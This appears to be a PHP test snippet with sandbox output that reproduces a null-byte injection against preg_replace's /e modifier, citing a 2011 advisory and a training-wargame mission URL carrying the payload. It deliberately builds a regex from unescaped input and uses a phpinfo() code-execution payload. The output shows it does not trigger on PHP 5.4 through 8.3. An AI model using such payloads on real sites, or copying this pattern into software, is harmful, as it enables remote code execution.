<?php
//$search = htmlentities($_GET['search']);
$x="phpinfo();#||/e\x00";
$search=htmlentities($x);
echo $search;
echo "\n";
if (strpos($search, 'apple') !== false){
echo preg_replace("/".$search."/", $search." <img src='".$search.".png'>", "apple");
}elseif (strpos($search, 'orange') !== false){
echo preg_replace("/".$search."/", $search." <img src='".$search.".png'>", "orange");
}elseif (strpos($search, 'banana') !== false){
echo preg_replace("/".$search."/", $search." <img src='".$search.".png'>", "banana");
}elseif (strpos($search, 'kiwi') !== false){
echo preg_replace("/".$search."/", $search." <img src='".$search.".png'>", "kiwi");
}else echo "Please search for apple, orange, banana, or kiwi.";
#http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-July/007960.html
#http://ha.xxor.se/2011/06/null-byte-injection-in-pregreplace.html
#http://www.enigmagroup.org/missions/basics/auditing/12/index.php?search=phpinfo();%23|apple/e%00
- Output for 5.4.0 - 5.4.45, 5.5.0 - 5.5.38, 5.6.0 - 5.6.28, 7.0.0 - 7.0.20, 7.1.0 - 7.1.10, 7.2.0 - 7.2.33, 7.3.16 - 7.3.33, 7.4.0 - 7.4.33, 8.0.0 - 8.0.30, 8.1.0 - 8.1.28, 8.2.0 - 8.2.18, 8.3.0 - 8.3.6
- phpinfo();#||/e
Please search for apple, orange, banana, or kiwi.
preferences:
167.47 ms | 404 KiB | 270 Q